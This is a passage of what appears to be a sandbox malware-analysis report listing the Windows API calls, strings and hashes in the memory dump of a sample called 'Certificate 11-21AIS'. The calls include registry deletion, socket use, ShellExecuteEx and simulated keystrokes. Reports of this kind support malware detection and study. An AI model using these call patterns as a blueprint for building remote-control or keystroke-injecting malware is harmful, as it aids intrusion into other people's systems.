                                                                              • Instruction Fuzzy Hash: BBC16B75A0521ADFDB00CF98C485BAEB7F5FF09311F20846AE615E72D1D734A981CB92
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00906B63
                                                                              • LoadStringW.USER32(00000000), ref: 00906B6A
                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00906B80
                                                                              • LoadStringW.USER32(00000000), ref: 00906B87
                                                                              • _wprintf.LIBCMT ref: 00906BAD
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00906BCB
                                                                              Strings
                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00906BA8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                              • API String ID: 3648134473-3128320259
                                                                              • Opcode ID: 2dcaec80b85a136735ded40e80b1884a9a0fa97f70af36d176aa1b12d396dde6
                                                                              • Instruction ID: 3fa97985b061899fb89ceba4f0f4ab1307628e3926a5d9d82f3487411ccbbbe1
                                                                              • Opcode Fuzzy Hash: 2dcaec80b85a136735ded40e80b1884a9a0fa97f70af36d176aa1b12d396dde6
                                                                              • Instruction Fuzzy Hash: BE0186FA504208BFEB11A794DD89EFB336CD708305F0044A1B745D2041EA749E849F70
                                                                              APIs
                                                                                • Part of subcall function 00923C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00922BB5,?,?), ref: 00923C1D
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00922BF6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharConnectRegistryUpper
                                                                              • String ID:
                                                                              • API String ID: 2595220575-0
                                                                              • Opcode ID: 927a579726cd52d614afca1a4ae0a35a22dba5053e8aae53f221b786bdd809d3
                                                                              • Instruction ID: bd9009a6a149a4702d3a626e13003674338ee6c5c38eb07cc84fbef199f16e07
                                                                              • Opcode Fuzzy Hash: 927a579726cd52d614afca1a4ae0a35a22dba5053e8aae53f221b786bdd809d3
                                                                              • Instruction Fuzzy Hash: 16915575204211AFCB10EF68D891F6EB7E5FF98310F04885DF9969B2A2DB35E905CB42
                                                                              APIs
                                                                              • select.WSOCK32 ref: 00919691
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0091969E
                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 009196C8
                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009196E9
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009196F8
                                                                              • inet_ntoa.WSOCK32(?), ref: 00919765
                                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 009197AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$htonsinet_ntoaselect
                                                                              • String ID:
                                                                              • API String ID: 500251541-0
                                                                              • Opcode ID: 31d6de4c94dc4627a150003c6a28cefe52ed5b52b637cd9ccf26e38f204b944b
                                                                              • Instruction ID: 4ca0bd091d4228ec925349d7287f9f4cad6eaccbe06fcf3121ea6b7e61bfd933
                                                                              • Opcode Fuzzy Hash: 31d6de4c94dc4627a150003c6a28cefe52ed5b52b637cd9ccf26e38f204b944b
                                                                              • Instruction Fuzzy Hash: 0171BA71608204ABC714EF68CC95FABB7A8FF85714F104A2DF5559B2A1EB30ED44CB92
                                                                              APIs
                                                                              • __mtinitlocknum.LIBCMT ref: 008EA991
                                                                                • Part of subcall function 008E7D7C: __FF_MSGBANNER.LIBCMT ref: 008E7D91
                                                                                • Part of subcall function 008E7D7C: __NMSG_WRITE.LIBCMT ref: 008E7D98
                                                                                • Part of subcall function 008E7D7C: __malloc_crt.LIBCMT ref: 008E7DB8
                                                                              • __lock.LIBCMT ref: 008EA9A4
                                                                              • __lock.LIBCMT ref: 008EA9F0
                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00976DE0,00000018,008F5E7B,?,00000000,00000109), ref: 008EAA0C
                                                                              • EnterCriticalSection.KERNEL32(8000000C,00976DE0,00000018,008F5E7B,?,00000000,00000109), ref: 008EAA29
                                                                              • LeaveCriticalSection.KERNEL32(8000000C), ref: 008EAA39
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 1422805418-0
                                                                              • Opcode ID: caa52676e19e5a8f14aea3c523ec63d4e7ad3a750e170c481d535d751af7ad42
                                                                              • Instruction ID: de1d8682530ac3a74cb40e9374662b28467d23cf3984eb0fe0892dab75598456
                                                                              • Opcode Fuzzy Hash: caa52676e19e5a8f14aea3c523ec63d4e7ad3a750e170c481d535d751af7ad42
                                                                              • Instruction Fuzzy Hash: CA413B71A147959BEB189F6ED94475CBBB0FF43B34F208228E425EB2D1D774A844CB82
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 00928EE4
                                                                              • GetDC.USER32(00000000), ref: 00928EEC
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00928EF7
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00928F03
                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00928F3F
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00928F50
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0092BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00928F8A
                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00928FAA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 3864802216-0
                                                                              • Opcode ID: 9cc2cc3113a78b40de1e685f3b0fe8582d5a310913173529f6fa11b709821a42
                                                                              • Instruction ID: d9dc8e9135d3af91b11e29b5fcd180b5c0b9ca62656342878e3acbce123683d1
                                                                              • Opcode Fuzzy Hash: 9cc2cc3113a78b40de1e685f3b0fe8582d5a310913173529f6fa11b709821a42
                                                                              • Instruction Fuzzy Hash: E9319F76216224BFEB108F50DC49FEB3BADEF4A715F054065FE089A195C6759841CBB0
                                                                              APIs
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                                • Part of subcall function 008DC6F4: _wcscpy.LIBCMT ref: 008DC717
                                                                              • _wcstok.LIBCMT ref: 0091184E
                                                                              • _wcscpy.LIBCMT ref: 009118DD
                                                                              • _memset.LIBCMT ref: 00911910
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                              • String ID: X
                                                                              • API String ID: 774024439-3081909835
                                                                              • Opcode ID: 7fd7c0cf9698c0798015cca3f4dd2bcf5e47a72eba73777430b10cced80ec6d2
                                                                              • Instruction ID: 353708117c14512abe0b2cac5db22bfc24b92480034f61a569c19ca73b08c446
                                                                              • Opcode Fuzzy Hash: 7fd7c0cf9698c0798015cca3f4dd2bcf5e47a72eba73777430b10cced80ec6d2
                                                                              • Instruction Fuzzy Hash: B1C15A316043449FC724EF68C951E9AB7F4FF85350F04896DF999972A2DB30E844CB82
                                                                              APIs
                                                                                • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0093016D
                                                                              • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0093038D
                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009303AB
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?), ref: 009303D6
                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009303FF
                                                                              • ShowWindow.USER32(00000003,00000000), ref: 00930421
                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00930440
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                              • String ID:
                                                                              • API String ID: 3356174886-0
                                                                              • Opcode ID: 9e08fd6a84ea430a8d61550d60fb5d22ac5608e774a6b322e5bf827cbc6d3296
                                                                              • Instruction ID: 487f50d104636ea22ab6d195aacafedd3a4aa8ef6555047093e4b58d6b0c45f6
                                                                              • Opcode Fuzzy Hash: 9e08fd6a84ea430a8d61550d60fb5d22ac5608e774a6b322e5bf827cbc6d3296
                                                                              • Instruction Fuzzy Hash: 94A19D35600616EFDB18CF68C999BBEBBB5BF88700F048115EC59A7290E734AD60DF90
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: abba3a587bb96fc82fb0e230a383913b8349baeecafb9e02988454b6ef087ad8
                                                                              • Instruction ID: 6dd6d792ddf0d9e76c8379eb30c0e85e2109b0381b67ef5607e33416b831facc
                                                                              • Opcode Fuzzy Hash: abba3a587bb96fc82fb0e230a383913b8349baeecafb9e02988454b6ef087ad8
                                                                              • Instruction Fuzzy Hash: DD715CB5904109EFCB18CF98CC89EAEBB79FF85314F24828AF915A7251C7349A41CF65
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0092225A
                                                                              • _memset.LIBCMT ref: 00922323
                                                                              • ShellExecuteExW.SHELL32(?), ref: 00922368
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                                • Part of subcall function 008DC6F4: _wcscpy.LIBCMT ref: 008DC717
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0092242F
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0092243E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                              • String ID: @
                                                                              • API String ID: 4082843840-2766056989
                                                                              • Opcode ID: 28c293382a80a2b99ddf8d2b7c581687d08e4a8e90d8774bfdcc76b0cb68ad96
                                                                              • Instruction ID: 1dc5238a2745af06d3ef5dbc63c79e2d815b5d5468ed3456b5453e25a0052891
                                                                              • Opcode Fuzzy Hash: 28c293382a80a2b99ddf8d2b7c581687d08e4a8e90d8774bfdcc76b0cb68ad96
                                                                              • Instruction Fuzzy Hash: 51716D74A00629EFCF04EFA8D885A9EB7F5FF48710F108559E856AB361DB34AD40CB91
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 00903DE7
                                                                              • GetKeyboardState.USER32(?), ref: 00903DFC
                                                                              • SetKeyboardState.USER32(?), ref: 00903E5D
                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00903E8B
                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00903EAA
                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00903EF0
                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00903F13
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: 682efa0a0876a5cde5e8bef49038332d66d689b6da6fb7f6490a5065e8c33fc4
                                                                              • Instruction ID: afe983edea6455296c83edd12d2e272c53ddfdd4ad980f37a4ba0711eb2c54d3
                                                                              • Opcode Fuzzy Hash: 682efa0a0876a5cde5e8bef49038332d66d689b6da6fb7f6490a5065e8c33fc4
                                                                              • Instruction Fuzzy Hash: 2F51D3A0A187D53EFB364324CC45BB67EAD5B06304F08CA89F1D9468D2D3A8EEC4D760
                                                                              APIs
                                                                              • GetParent.USER32(00000000), ref: 00903C02
                                                                              • GetKeyboardState.USER32(?), ref: 00903C17
                                                                              • SetKeyboardState.USER32(?), ref: 00903C78
                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00903CA4
                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00903CC1
                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00903D05
                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00903D26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: 0b6fd04bb27f7eb8b4e1019e6aec9f67460413158108aa1b68f459b948e36e61
                                                                              • Instruction ID: 63d459705a9ee623ad28a2498a8481735171bf0470fd5e5f475e4d261aaf4a83
                                                                              • Opcode Fuzzy Hash: 0b6fd04bb27f7eb8b4e1019e6aec9f67460413158108aa1b68f459b948e36e61
                                                                              • Instruction Fuzzy Hash: 0C5105A05487D53DFB3287348C46BBABFAD6F06304F0CC489E5D59A8C2D694EE84E760
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsncpy$LocalTime
                                                                              • String ID:
                                                                              • API String ID: 2945705084-0
                                                                              • Opcode ID: 93137efcd088f4b32cbe422607c5b35f1f2a93b03e758826ada0509f2dec3ff9
                                                                              • Instruction ID: d9026117972a4e8e75902179e52b475c45b233792b2eb8015fc3d224c3a4ace2
                                                                              • Opcode Fuzzy Hash: 93137efcd088f4b32cbe422607c5b35f1f2a93b03e758826ada0509f2dec3ff9
                                                                              • Instruction Fuzzy Hash: 94418466C102587ACF10EBF9CC4A9CFB3ACEF06310F504966E504E3161F674E650C7A6
                                                                              APIs
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00923DA1
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00923DCB
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00923E80
                                                                                • Part of subcall function 00923D72: RegCloseKey.ADVAPI32(?), ref: 00923DE8
                                                                                • Part of subcall function 00923D72: FreeLibrary.KERNEL32(?), ref: 00923E3A
                                                                                • Part of subcall function 00923D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00923E5D
                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00923E25
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                              • String ID:
                                                                              • API String ID: 395352322-0
                                                                              • Opcode ID: 458071cd6d9385a8c53828080e1353898afb574812e12dcfd63b7e8825d3a8f3
                                                                              • Instruction ID: f674a6dc15863ccba4dddf6652069a521db9d6f6dbc64befa43c870b1f18be26
                                                                              • Opcode Fuzzy Hash: 458071cd6d9385a8c53828080e1353898afb574812e12dcfd63b7e8825d3a8f3
                                                                              • Instruction Fuzzy Hash: 5F315AB5911119BFDB149F90EC89EFFB7BCEF09300F00416AE512E2154D6789F899BA0
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00928FE7
                                                                              • GetWindowLongW.USER32(00FBDC10,000000F0), ref: 0092901A
                                                                              • GetWindowLongW.USER32(00FBDC10,000000F0), ref: 0092904F
                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00929081
                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009290AB
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 009290BC
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009290D6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 2178440468-0
                                                                              • Opcode ID: 0775410cf7035f7aaada0d9afc5a91823b99a93dfae763ee089b51385959cac1
                                                                              • Instruction ID: 79f88e5737b82c6fd05873c9d9f68ab9c25a4b17e6b88d2cf88fed53d4d43794
                                                                              • Opcode Fuzzy Hash: 0775410cf7035f7aaada0d9afc5a91823b99a93dfae763ee089b51385959cac1
                                                                              • Instruction Fuzzy Hash: 56315538698228EFDB20CF58EC84F6537A9FB4A314F150164FA198F2B5CB71A841EB40
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009008F2
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00900918
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0090091B
                                                                              • SysAllocString.OLEAUT32(?), ref: 00900939
                                                                              • SysFreeString.OLEAUT32(?), ref: 00900942
                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00900967
                                                                              • SysAllocString.OLEAUT32(?), ref: 00900975
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                              • String ID:
                                                                              • API String ID: 3761583154-0
                                                                              • Opcode ID: 268eb546f9ca9947dbf8824bd2844fbf3a460e4634059f182d95e40a553f698f
                                                                              • Instruction ID: 11a9e074c9c966af155299924469e79661b662fb25ee9ab75efcc2fd4bcff14f
                                                                              • Opcode Fuzzy Hash: 268eb546f9ca9947dbf8824bd2844fbf3a460e4634059f182d95e40a553f698f
                                                                              • Instruction Fuzzy Hash: DA21B77A605208AFDB109F68CC84EBB73ACFF49360F008525F919DB291D670EC419B60
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
